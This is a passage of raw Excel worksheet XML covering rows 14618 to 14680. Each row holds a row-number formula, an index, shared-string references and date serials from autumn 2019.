      <c r="E14618" t="s">
        <v>22166</v>
      </c>
      <c r="F14618" t="s">
        <v>10526</v>
      </c>
      <c r="G14618" t="s">
        <v>25080</v>
      </c>
    </row>
    <row r="14619" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14619">
        <f t="shared" si="228"/>
        <v>14618</v>
      </c>
      <c r="B14619">
        <v>4618</v>
      </c>
      <c r="C14619" t="s">
        <v>19637</v>
      </c>
      <c r="D14619" s="1">
        <v>43749</v>
      </c>
      <c r="F14619" t="s">
        <v>10526</v>
      </c>
      <c r="G14619" t="s">
        <v>25081</v>
      </c>
    </row>
    <row r="14620" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14620">
        <f t="shared" si="228"/>
        <v>14619</v>
      </c>
      <c r="B14620">
        <v>4619</v>
      </c>
      <c r="C14620" t="s">
        <v>19637</v>
      </c>
      <c r="D14620" s="1">
        <v>43741</v>
      </c>
      <c r="E14620" t="s">
        <v>19643</v>
      </c>
      <c r="F14620" t="s">
        <v>10021</v>
      </c>
      <c r="G14620" t="s">
        <v>25082</v>
      </c>
    </row>
    <row r="14621" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14621">
        <f t="shared" si="228"/>
        <v>14620</v>
      </c>
      <c r="B14621">
        <v>4620</v>
      </c>
      <c r="C14621" t="s">
        <v>19637</v>
      </c>
      <c r="D14621" s="1">
        <v>43754</v>
      </c>
      <c r="E14621" t="s">
        <v>19690</v>
      </c>
      <c r="F14621" t="s">
        <v>9978</v>
      </c>
      <c r="G14621" t="s">
        <v>25083</v>
      </c>
    </row>
    <row r="14622" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14622">
        <f t="shared" si="228"/>
        <v>14621</v>
      </c>
      <c r="B14622">
        <v>4621</v>
      </c>
      <c r="C14622" t="s">
        <v>19637</v>
      </c>
      <c r="D14622" s="1">
        <v>43748</v>
      </c>
      <c r="E14622" t="s">
        <v>19640</v>
      </c>
      <c r="F14622" t="s">
        <v>9975</v>
      </c>
      <c r="G14622" t="s">
        <v>25084</v>
      </c>
    </row>
    <row r="14623" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14623">
        <f t="shared" si="228"/>
        <v>14622</v>
      </c>
      <c r="B14623">
        <v>4622</v>
      </c>
      <c r="C14623" t="s">
        <v>19637</v>
      </c>
      <c r="D14623" s="1">
        <v>43746</v>
      </c>
      <c r="E14623" t="s">
        <v>20995</v>
      </c>
      <c r="F14623" t="s">
        <v>9975</v>
      </c>
      <c r="G14623" t="s">
        <v>25085</v>
      </c>
    </row>
    <row r="14624" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14624">
        <f t="shared" si="228"/>
        <v>14623</v>
      </c>
      <c r="B14624">
        <v>4623</v>
      </c>
      <c r="C14624" t="s">
        <v>19637</v>
      </c>
      <c r="D14624" s="1">
        <v>43756</v>
      </c>
      <c r="E14624" t="s">
        <v>19705</v>
      </c>
      <c r="F14624" t="s">
        <v>10021</v>
      </c>
      <c r="G14624" t="s">
        <v>25086</v>
      </c>
    </row>
    <row r="14625" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14625">
        <f t="shared" si="228"/>
        <v>14624</v>
      </c>
      <c r="B14625">
        <v>4624</v>
      </c>
      <c r="C14625" t="s">
        <v>19637</v>
      </c>
      <c r="D14625" s="1">
        <v>43747</v>
      </c>
      <c r="F14625" t="s">
        <v>9975</v>
      </c>
      <c r="G14625" t="s">
        <v>25087</v>
      </c>
    </row>
    <row r="14626" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14626">
        <f t="shared" si="228"/>
        <v>14625</v>
      </c>
      <c r="B14626">
        <v>4625</v>
      </c>
      <c r="C14626" t="s">
        <v>19637</v>
      </c>
      <c r="D14626" s="1">
        <v>43747</v>
      </c>
      <c r="F14626" t="s">
        <v>10526</v>
      </c>
      <c r="G14626" t="s">
        <v>25088</v>
      </c>
    </row>
    <row r="14627" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14627">
        <f t="shared" si="228"/>
        <v>14626</v>
      </c>
      <c r="B14627">
        <v>4626</v>
      </c>
      <c r="C14627" t="s">
        <v>19637</v>
      </c>
      <c r="D14627" s="1">
        <v>43747</v>
      </c>
      <c r="E14627" t="s">
        <v>19690</v>
      </c>
      <c r="F14627" t="s">
        <v>9978</v>
      </c>
      <c r="G14627" t="s">
        <v>25089</v>
      </c>
    </row>
    <row r="14628" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14628">
        <f t="shared" si="228"/>
        <v>14627</v>
      </c>
      <c r="B14628">
        <v>4627</v>
      </c>
      <c r="C14628" t="s">
        <v>19637</v>
      </c>
      <c r="D14628" s="1">
        <v>43743</v>
      </c>
      <c r="E14628" t="s">
        <v>19640</v>
      </c>
      <c r="F14628" t="s">
        <v>10021</v>
      </c>
      <c r="G14628" t="s">
        <v>25090</v>
      </c>
    </row>
    <row r="14629" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14629">
        <f t="shared" si="228"/>
        <v>14628</v>
      </c>
      <c r="B14629">
        <v>4628</v>
      </c>
      <c r="C14629" t="s">
        <v>19637</v>
      </c>
      <c r="D14629" s="1">
        <v>43747</v>
      </c>
      <c r="E14629" t="s">
        <v>19680</v>
      </c>
      <c r="F14629" t="s">
        <v>10021</v>
      </c>
      <c r="G14629" t="s">
        <v>25091</v>
      </c>
    </row>
    <row r="14630" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14630">
        <f t="shared" si="228"/>
        <v>14629</v>
      </c>
      <c r="B14630">
        <v>4629</v>
      </c>
      <c r="C14630" t="s">
        <v>19637</v>
      </c>
      <c r="D14630" s="1">
        <v>43741</v>
      </c>
      <c r="E14630" t="s">
        <v>25092</v>
      </c>
      <c r="F14630" t="s">
        <v>10526</v>
      </c>
      <c r="G14630" t="s">
        <v>25093</v>
      </c>
    </row>
    <row r="14631" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14631">
        <f t="shared" si="228"/>
        <v>14630</v>
      </c>
      <c r="B14631">
        <v>4630</v>
      </c>
      <c r="C14631" t="s">
        <v>19637</v>
      </c>
      <c r="D14631" s="1">
        <v>43751</v>
      </c>
      <c r="E14631" t="s">
        <v>19680</v>
      </c>
      <c r="F14631" t="s">
        <v>10021</v>
      </c>
      <c r="G14631" t="s">
        <v>25094</v>
      </c>
    </row>
    <row r="14632" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14632">
        <f t="shared" si="228"/>
        <v>14631</v>
      </c>
      <c r="B14632">
        <v>4631</v>
      </c>
      <c r="C14632" t="s">
        <v>19637</v>
      </c>
      <c r="D14632" s="1">
        <v>43747</v>
      </c>
      <c r="E14632" t="s">
        <v>21083</v>
      </c>
      <c r="F14632" t="s">
        <v>10526</v>
      </c>
      <c r="G14632" t="s">
        <v>25095</v>
      </c>
    </row>
    <row r="14633" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14633">
        <f t="shared" si="228"/>
        <v>14632</v>
      </c>
      <c r="B14633">
        <v>4632</v>
      </c>
      <c r="C14633" t="s">
        <v>19637</v>
      </c>
      <c r="D14633" s="1">
        <v>43741</v>
      </c>
      <c r="F14633" t="s">
        <v>10526</v>
      </c>
      <c r="G14633" t="s">
        <v>25096</v>
      </c>
    </row>
    <row r="14634" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14634">
        <f t="shared" si="228"/>
        <v>14633</v>
      </c>
      <c r="B14634">
        <v>4633</v>
      </c>
      <c r="C14634" t="s">
        <v>19637</v>
      </c>
      <c r="D14634" s="1">
        <v>43753</v>
      </c>
      <c r="E14634" t="s">
        <v>19693</v>
      </c>
      <c r="F14634" t="s">
        <v>10526</v>
      </c>
      <c r="G14634" t="s">
        <v>25097</v>
      </c>
    </row>
    <row r="14635" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14635">
        <f t="shared" si="228"/>
        <v>14634</v>
      </c>
      <c r="B14635">
        <v>4634</v>
      </c>
      <c r="C14635" t="s">
        <v>19637</v>
      </c>
      <c r="D14635" s="1">
        <v>43752</v>
      </c>
      <c r="F14635" t="s">
        <v>10021</v>
      </c>
      <c r="G14635" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="14636" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14636">
        <f t="shared" si="228"/>
        <v>14635</v>
      </c>
      <c r="B14636">
        <v>4635</v>
      </c>
      <c r="C14636" t="s">
        <v>19637</v>
      </c>
      <c r="D14636" s="1">
        <v>43738</v>
      </c>
      <c r="E14636" t="s">
        <v>20704</v>
      </c>
      <c r="F14636" t="s">
        <v>10526</v>
      </c>
      <c r="G14636" t="s">
        <v>25039</v>
      </c>
    </row>
    <row r="14637" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14637">
        <f t="shared" si="228"/>
        <v>14636</v>
      </c>
      <c r="B14637">
        <v>4636</v>
      </c>
      <c r="C14637" t="s">
        <v>19637</v>
      </c>
      <c r="D14637" s="1">
        <v>43750</v>
      </c>
      <c r="E14637" t="s">
        <v>19717</v>
      </c>
      <c r="F14637" t="s">
        <v>10526</v>
      </c>
      <c r="G14637" t="s">
        <v>25098</v>
      </c>
    </row>
    <row r="14638" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14638">
        <f t="shared" si="228"/>
        <v>14637</v>
      </c>
      <c r="B14638">
        <v>4637</v>
      </c>
      <c r="C14638" t="s">
        <v>19637</v>
      </c>
      <c r="D14638" s="1">
        <v>43744</v>
      </c>
      <c r="E14638" t="s">
        <v>19640</v>
      </c>
      <c r="F14638" t="s">
        <v>9975</v>
      </c>
      <c r="G14638" t="s">
        <v>25099</v>
      </c>
    </row>
    <row r="14639" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14639">
        <f t="shared" si="228"/>
        <v>14638</v>
      </c>
      <c r="B14639">
        <v>4638</v>
      </c>
      <c r="C14639" t="s">
        <v>19637</v>
      </c>
      <c r="D14639" s="1">
        <v>43745</v>
      </c>
      <c r="E14639" t="s">
        <v>24578</v>
      </c>
      <c r="F14639" t="s">
        <v>10526</v>
      </c>
      <c r="G14639" t="s">
        <v>25100</v>
      </c>
    </row>
    <row r="14640" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14640">
        <f t="shared" si="228"/>
        <v>14639</v>
      </c>
      <c r="B14640">
        <v>4639</v>
      </c>
      <c r="C14640" t="s">
        <v>19637</v>
      </c>
      <c r="D14640" s="1">
        <v>43751</v>
      </c>
      <c r="F14640" t="s">
        <v>10526</v>
      </c>
      <c r="G14640" t="s">
        <v>25101</v>
      </c>
    </row>
    <row r="14641" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14641">
        <f t="shared" si="228"/>
        <v>14640</v>
      </c>
      <c r="B14641">
        <v>4640</v>
      </c>
      <c r="C14641" t="s">
        <v>19637</v>
      </c>
      <c r="D14641" s="1">
        <v>43742</v>
      </c>
      <c r="E14641" t="s">
        <v>19717</v>
      </c>
      <c r="F14641" t="s">
        <v>10526</v>
      </c>
      <c r="G14641" t="s">
        <v>25102</v>
      </c>
    </row>
    <row r="14642" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14642">
        <f t="shared" si="228"/>
        <v>14641</v>
      </c>
      <c r="B14642">
        <v>4641</v>
      </c>
      <c r="C14642" t="s">
        <v>19637</v>
      </c>
      <c r="D14642" s="1">
        <v>43753</v>
      </c>
      <c r="E14642" t="s">
        <v>25103</v>
      </c>
      <c r="F14642" t="s">
        <v>10526</v>
      </c>
      <c r="G14642" t="s">
        <v>25104</v>
      </c>
    </row>
    <row r="14643" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14643">
        <f t="shared" si="228"/>
        <v>14642</v>
      </c>
      <c r="B14643">
        <v>4642</v>
      </c>
      <c r="C14643" t="s">
        <v>19637</v>
      </c>
      <c r="D14643" s="1">
        <v>43757</v>
      </c>
      <c r="E14643" t="s">
        <v>19648</v>
      </c>
      <c r="F14643" t="s">
        <v>10021</v>
      </c>
      <c r="G14643" t="s">
        <v>25105</v>
      </c>
    </row>
    <row r="14644" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14644">
        <f t="shared" si="228"/>
        <v>14643</v>
      </c>
      <c r="B14644">
        <v>4643</v>
      </c>
      <c r="C14644" t="s">
        <v>19637</v>
      </c>
      <c r="D14644" s="1">
        <v>43746</v>
      </c>
      <c r="E14644" t="s">
        <v>19717</v>
      </c>
      <c r="F14644" t="s">
        <v>10526</v>
      </c>
      <c r="G14644" t="s">
        <v>25106</v>
      </c>
    </row>
    <row r="14645" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14645">
        <f t="shared" si="228"/>
        <v>14644</v>
      </c>
      <c r="B14645">
        <v>4644</v>
      </c>
      <c r="C14645" t="s">
        <v>19637</v>
      </c>
      <c r="D14645" s="1">
        <v>43741</v>
      </c>
      <c r="E14645" t="s">
        <v>19690</v>
      </c>
      <c r="F14645" t="s">
        <v>9978</v>
      </c>
      <c r="G14645" t="s">
        <v>25107</v>
      </c>
    </row>
    <row r="14646" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14646">
        <f t="shared" si="228"/>
        <v>14645</v>
      </c>
      <c r="B14646">
        <v>4645</v>
      </c>
      <c r="C14646" t="s">
        <v>19637</v>
      </c>
      <c r="D14646" s="1">
        <v>43749</v>
      </c>
      <c r="E14646" t="s">
        <v>19881</v>
      </c>
      <c r="F14646" t="s">
        <v>9978</v>
      </c>
      <c r="G14646" t="s">
        <v>25108</v>
      </c>
    </row>
    <row r="14647" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14647">
        <f t="shared" si="228"/>
        <v>14646</v>
      </c>
      <c r="B14647">
        <v>4646</v>
      </c>
      <c r="C14647" t="s">
        <v>19637</v>
      </c>
      <c r="D14647" s="1">
        <v>43753</v>
      </c>
      <c r="F14647" t="s">
        <v>10526</v>
      </c>
      <c r="G14647" t="s">
        <v>25109</v>
      </c>
    </row>
    <row r="14648" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14648">
        <f t="shared" si="228"/>
        <v>14647</v>
      </c>
      <c r="B14648">
        <v>4647</v>
      </c>
      <c r="C14648" t="s">
        <v>19637</v>
      </c>
      <c r="D14648" s="1">
        <v>43739</v>
      </c>
      <c r="E14648" t="s">
        <v>19640</v>
      </c>
      <c r="F14648" t="s">
        <v>9975</v>
      </c>
      <c r="G14648" t="s">
        <v>25110</v>
      </c>
    </row>
    <row r="14649" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14649">
        <f t="shared" si="228"/>
        <v>14648</v>
      </c>
      <c r="B14649">
        <v>4648</v>
      </c>
      <c r="C14649" t="s">
        <v>19637</v>
      </c>
      <c r="D14649" s="1">
        <v>43745</v>
      </c>
      <c r="E14649" t="s">
        <v>25111</v>
      </c>
      <c r="F14649" t="s">
        <v>9978</v>
      </c>
      <c r="G14649" t="s">
        <v>25112</v>
      </c>
    </row>
    <row r="14650" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14650">
        <f t="shared" si="228"/>
        <v>14649</v>
      </c>
      <c r="B14650">
        <v>4649</v>
      </c>
      <c r="C14650" t="s">
        <v>19637</v>
      </c>
      <c r="D14650" s="1">
        <v>43752</v>
      </c>
      <c r="E14650" t="s">
        <v>19640</v>
      </c>
      <c r="F14650" t="s">
        <v>10526</v>
      </c>
      <c r="G14650" t="s">
        <v>25113</v>
      </c>
    </row>
    <row r="14651" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14651">
        <f t="shared" si="228"/>
        <v>14650</v>
      </c>
      <c r="B14651">
        <v>4650</v>
      </c>
      <c r="C14651" t="s">
        <v>19637</v>
      </c>
      <c r="D14651" s="1">
        <v>43753</v>
      </c>
      <c r="E14651" t="s">
        <v>25114</v>
      </c>
      <c r="F14651" t="s">
        <v>10526</v>
      </c>
      <c r="G14651" t="s">
        <v>25115</v>
      </c>
    </row>
    <row r="14652" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14652">
        <f t="shared" si="228"/>
        <v>14651</v>
      </c>
      <c r="B14652">
        <v>4651</v>
      </c>
      <c r="C14652" t="s">
        <v>19637</v>
      </c>
      <c r="D14652" s="1">
        <v>43742</v>
      </c>
      <c r="F14652" t="s">
        <v>9978</v>
      </c>
      <c r="G14652" t="s">
        <v>25116</v>
      </c>
    </row>
    <row r="14653" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14653">
        <f t="shared" si="228"/>
        <v>14652</v>
      </c>
      <c r="B14653">
        <v>4652</v>
      </c>
      <c r="C14653" t="s">
        <v>19637</v>
      </c>
      <c r="D14653" s="1">
        <v>43754</v>
      </c>
      <c r="E14653" t="s">
        <v>19640</v>
      </c>
      <c r="F14653" t="s">
        <v>10021</v>
      </c>
      <c r="G14653" t="s">
        <v>25117</v>
      </c>
    </row>
    <row r="14654" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14654">
        <f t="shared" si="228"/>
        <v>14653</v>
      </c>
      <c r="B14654">
        <v>4653</v>
      </c>
      <c r="C14654" t="s">
        <v>19637</v>
      </c>
      <c r="D14654" s="1">
        <v>43740</v>
      </c>
      <c r="E14654" t="s">
        <v>25118</v>
      </c>
      <c r="F14654" t="s">
        <v>10021</v>
      </c>
      <c r="G14654" t="s">
        <v>25119</v>
      </c>
    </row>
    <row r="14655" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14655">
        <f t="shared" si="228"/>
        <v>14654</v>
      </c>
      <c r="B14655">
        <v>4654</v>
      </c>
      <c r="C14655" t="s">
        <v>19637</v>
      </c>
      <c r="D14655" s="1">
        <v>43753</v>
      </c>
      <c r="E14655" t="s">
        <v>19680</v>
      </c>
      <c r="F14655" t="s">
        <v>10021</v>
      </c>
      <c r="G14655" t="s">
        <v>25120</v>
      </c>
    </row>
    <row r="14656" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14656">
        <f t="shared" si="228"/>
        <v>14655</v>
      </c>
      <c r="B14656">
        <v>4655</v>
      </c>
      <c r="C14656" t="s">
        <v>19637</v>
      </c>
      <c r="D14656" s="1">
        <v>43739</v>
      </c>
      <c r="E14656" t="s">
        <v>19796</v>
      </c>
      <c r="F14656" t="s">
        <v>10021</v>
      </c>
      <c r="G14656" t="s">
        <v>25121</v>
      </c>
    </row>
    <row r="14657" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14657">
        <f t="shared" si="228"/>
        <v>14656</v>
      </c>
      <c r="B14657">
        <v>4656</v>
      </c>
      <c r="C14657" t="s">
        <v>19637</v>
      </c>
      <c r="D14657" s="1">
        <v>43741</v>
      </c>
      <c r="E14657" t="s">
        <v>19640</v>
      </c>
      <c r="F14657" t="s">
        <v>9975</v>
      </c>
      <c r="G14657" t="s">
        <v>25122</v>
      </c>
    </row>
    <row r="14658" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14658">
        <f t="shared" si="228"/>
        <v>14657</v>
      </c>
      <c r="B14658">
        <v>4657</v>
      </c>
      <c r="C14658" t="s">
        <v>19637</v>
      </c>
      <c r="D14658" s="1">
        <v>43752</v>
      </c>
      <c r="E14658" t="s">
        <v>21051</v>
      </c>
      <c r="F14658" t="s">
        <v>9978</v>
      </c>
      <c r="G14658" t="s">
        <v>25123</v>
      </c>
    </row>
    <row r="14659" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14659">
        <f t="shared" ref="A14659:A14722" si="229">+ROW(A14658)</f>
        <v>14658</v>
      </c>
      <c r="B14659">
        <v>4658</v>
      </c>
      <c r="C14659" t="s">
        <v>19637</v>
      </c>
      <c r="D14659" s="1">
        <v>43750</v>
      </c>
      <c r="E14659" t="s">
        <v>23804</v>
      </c>
      <c r="F14659" t="s">
        <v>10526</v>
      </c>
      <c r="G14659" t="s">
        <v>25124</v>
      </c>
    </row>
    <row r="14660" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14660">
        <f t="shared" si="229"/>
        <v>14659</v>
      </c>
      <c r="B14660">
        <v>4659</v>
      </c>
      <c r="C14660" t="s">
        <v>19637</v>
      </c>
      <c r="D14660" s="1">
        <v>43750</v>
      </c>
      <c r="F14660" t="s">
        <v>10526</v>
      </c>
      <c r="G14660" t="s">
        <v>25125</v>
      </c>
    </row>
    <row r="14661" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14661">
        <f t="shared" si="229"/>
        <v>14660</v>
      </c>
      <c r="B14661">
        <v>4660</v>
      </c>
      <c r="C14661" t="s">
        <v>19637</v>
      </c>
      <c r="D14661" s="1">
        <v>43746</v>
      </c>
      <c r="E14661" t="s">
        <v>19640</v>
      </c>
      <c r="F14661" t="s">
        <v>10021</v>
      </c>
      <c r="G14661" t="s">
        <v>25126</v>
      </c>
    </row>
    <row r="14662" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14662">
        <f t="shared" si="229"/>
        <v>14661</v>
      </c>
      <c r="B14662">
        <v>4661</v>
      </c>
      <c r="C14662" t="s">
        <v>19637</v>
      </c>
      <c r="D14662" s="1">
        <v>43745</v>
      </c>
      <c r="E14662" t="s">
        <v>19917</v>
      </c>
      <c r="F14662" t="s">
        <v>9975</v>
      </c>
      <c r="G14662" t="s">
        <v>25127</v>
      </c>
    </row>
    <row r="14663" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14663">
        <f t="shared" si="229"/>
        <v>14662</v>
      </c>
      <c r="B14663">
        <v>4662</v>
      </c>
      <c r="C14663" t="s">
        <v>19637</v>
      </c>
      <c r="D14663" s="1">
        <v>43753</v>
      </c>
      <c r="E14663" t="s">
        <v>19794</v>
      </c>
      <c r="F14663" t="s">
        <v>10526</v>
      </c>
      <c r="G14663" t="s">
        <v>25128</v>
      </c>
    </row>
    <row r="14664" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14664">
        <f t="shared" si="229"/>
        <v>14663</v>
      </c>
      <c r="B14664">
        <v>4663</v>
      </c>
      <c r="C14664" t="s">
        <v>19637</v>
      </c>
      <c r="D14664" s="1">
        <v>43742</v>
      </c>
      <c r="E14664" t="s">
        <v>25129</v>
      </c>
      <c r="F14664" t="s">
        <v>10526</v>
      </c>
      <c r="G14664" t="s">
        <v>25130</v>
      </c>
    </row>
    <row r="14665" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14665">
        <f t="shared" si="229"/>
        <v>14664</v>
      </c>
      <c r="B14665">
        <v>4664</v>
      </c>
      <c r="C14665" t="s">
        <v>19637</v>
      </c>
      <c r="D14665" s="1">
        <v>43742</v>
      </c>
      <c r="E14665" t="s">
        <v>20185</v>
      </c>
      <c r="F14665" t="s">
        <v>9975</v>
      </c>
      <c r="G14665" t="s">
        <v>25131</v>
      </c>
    </row>
    <row r="14666" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14666">
        <f t="shared" si="229"/>
        <v>14665</v>
      </c>
      <c r="B14666">
        <v>4665</v>
      </c>
      <c r="C14666" t="s">
        <v>19637</v>
      </c>
      <c r="D14666" s="1">
        <v>43744</v>
      </c>
      <c r="E14666" t="s">
        <v>19840</v>
      </c>
      <c r="F14666" t="s">
        <v>10021</v>
      </c>
      <c r="G14666" t="s">
        <v>25132</v>
      </c>
    </row>
    <row r="14667" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14667">
        <f t="shared" si="229"/>
        <v>14666</v>
      </c>
      <c r="B14667">
        <v>4666</v>
      </c>
      <c r="C14667" t="s">
        <v>19637</v>
      </c>
      <c r="D14667" s="1">
        <v>43740</v>
      </c>
      <c r="E14667" t="s">
        <v>19785</v>
      </c>
      <c r="F14667" t="s">
        <v>9975</v>
      </c>
      <c r="G14667" t="s">
        <v>25133</v>
      </c>
    </row>
    <row r="14668" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14668">
        <f t="shared" si="229"/>
        <v>14667</v>
      </c>
      <c r="B14668">
        <v>4667</v>
      </c>
      <c r="C14668" t="s">
        <v>19637</v>
      </c>
      <c r="D14668" s="1">
        <v>43751</v>
      </c>
      <c r="F14668" t="s">
        <v>10526</v>
      </c>
      <c r="G14668" t="s">
        <v>25134</v>
      </c>
    </row>
    <row r="14669" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14669">
        <f t="shared" si="229"/>
        <v>14668</v>
      </c>
      <c r="B14669">
        <v>4668</v>
      </c>
      <c r="C14669" t="s">
        <v>19637</v>
      </c>
      <c r="D14669" s="1">
        <v>43741</v>
      </c>
      <c r="E14669" t="s">
        <v>25135</v>
      </c>
      <c r="F14669" t="s">
        <v>10021</v>
      </c>
      <c r="G14669" t="s">
        <v>25136</v>
      </c>
    </row>
    <row r="14670" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14670">
        <f t="shared" si="229"/>
        <v>14669</v>
      </c>
      <c r="B14670">
        <v>4669</v>
      </c>
      <c r="C14670" t="s">
        <v>19637</v>
      </c>
      <c r="D14670" s="1">
        <v>43749</v>
      </c>
      <c r="F14670" t="s">
        <v>10526</v>
      </c>
      <c r="G14670" t="s">
        <v>25137</v>
      </c>
    </row>
    <row r="14671" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14671">
        <f t="shared" si="229"/>
        <v>14670</v>
      </c>
      <c r="B14671">
        <v>4670</v>
      </c>
      <c r="C14671" t="s">
        <v>19637</v>
      </c>
      <c r="D14671" s="1">
        <v>43743</v>
      </c>
      <c r="E14671" t="s">
        <v>19645</v>
      </c>
      <c r="F14671" t="s">
        <v>9975</v>
      </c>
      <c r="G14671" t="s">
        <v>25138</v>
      </c>
    </row>
    <row r="14672" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14672">
        <f t="shared" si="229"/>
        <v>14671</v>
      </c>
      <c r="B14672">
        <v>4671</v>
      </c>
      <c r="C14672" t="s">
        <v>19637</v>
      </c>
      <c r="D14672" s="1">
        <v>43754</v>
      </c>
      <c r="E14672" t="s">
        <v>21517</v>
      </c>
      <c r="F14672" t="s">
        <v>9978</v>
      </c>
      <c r="G14672" t="s">
        <v>25139</v>
      </c>
    </row>
    <row r="14673" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14673">
        <f t="shared" si="229"/>
        <v>14672</v>
      </c>
      <c r="B14673">
        <v>4672</v>
      </c>
      <c r="C14673" t="s">
        <v>19637</v>
      </c>
      <c r="D14673" s="1">
        <v>43739</v>
      </c>
      <c r="E14673" t="s">
        <v>19680</v>
      </c>
      <c r="F14673" t="s">
        <v>10021</v>
      </c>
      <c r="G14673" t="s">
        <v>25140</v>
      </c>
    </row>
    <row r="14674" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14674">
        <f t="shared" si="229"/>
        <v>14673</v>
      </c>
      <c r="B14674">
        <v>4673</v>
      </c>
      <c r="C14674" t="s">
        <v>19637</v>
      </c>
      <c r="D14674" s="1">
        <v>43741</v>
      </c>
      <c r="F14674" t="s">
        <v>10526</v>
      </c>
      <c r="G14674" t="s">
        <v>25141</v>
      </c>
    </row>
    <row r="14675" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14675">
        <f t="shared" si="229"/>
        <v>14674</v>
      </c>
      <c r="B14675">
        <v>4674</v>
      </c>
      <c r="C14675" t="s">
        <v>19637</v>
      </c>
      <c r="D14675" s="1">
        <v>43756</v>
      </c>
      <c r="E14675" t="s">
        <v>19785</v>
      </c>
      <c r="F14675" t="s">
        <v>9975</v>
      </c>
      <c r="G14675" t="s">
        <v>25142</v>
      </c>
    </row>
    <row r="14676" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14676">
        <f t="shared" si="229"/>
        <v>14675</v>
      </c>
      <c r="B14676">
        <v>4675</v>
      </c>
      <c r="C14676" t="s">
        <v>19637</v>
      </c>
      <c r="D14676" s="1">
        <v>43742</v>
      </c>
      <c r="E14676" t="s">
        <v>25143</v>
      </c>
      <c r="F14676" t="s">
        <v>10526</v>
      </c>
      <c r="G14676" t="s">
        <v>25144</v>
      </c>
    </row>
    <row r="14677" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14677">
        <f t="shared" si="229"/>
        <v>14676</v>
      </c>
      <c r="B14677">
        <v>4676</v>
      </c>
      <c r="C14677" t="s">
        <v>19637</v>
      </c>
      <c r="D14677" s="1">
        <v>43744</v>
      </c>
      <c r="E14677" t="s">
        <v>22791</v>
      </c>
      <c r="F14677" t="s">
        <v>10021</v>
      </c>
      <c r="G14677" t="s">
        <v>25145</v>
      </c>
    </row>
    <row r="14678" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14678">
        <f t="shared" si="229"/>
        <v>14677</v>
      </c>
      <c r="B14678">
        <v>4677</v>
      </c>
      <c r="C14678" t="s">
        <v>19637</v>
      </c>
      <c r="D14678" s="1">
        <v>43739</v>
      </c>
      <c r="E14678" t="s">
        <v>25146</v>
      </c>
      <c r="F14678" t="s">
        <v>10526</v>
      </c>
      <c r="G14678" t="s">
        <v>25147</v>
      </c>
    </row>
    <row r="14679" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14679">
        <f t="shared" si="229"/>
        <v>14678</v>
      </c>
      <c r="B14679">
        <v>4678</v>
      </c>
      <c r="C14679" t="s">
        <v>19637</v>
      </c>
      <c r="D14679" s="1">
        <v>43752</v>
      </c>
      <c r="E14679" t="s">
        <v>25148</v>
      </c>
      <c r="F14679" t="s">
        <v>9978</v>
      </c>
      <c r="G14679" t="s">
        <v>25149</v>
      </c>
    </row>
    <row r="14680" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14680">
        <f t="shared" si="229"/>
        <v>14679</v>
      </c>
      <c r="B14680">
        <v>4679</v>
      </c>
      <c r="C14680" t="s">
        <v>19637</v>
      </c>
      <c r="D14680" s="1">
        <v>43746</v>
      </c>
      <c r="E14680" t="s">
        <v>20250</v>
      </c>
      <c r="F14680" t="s">
        <v>10021</v>
      </c>
      <c r="G14680" t="s">
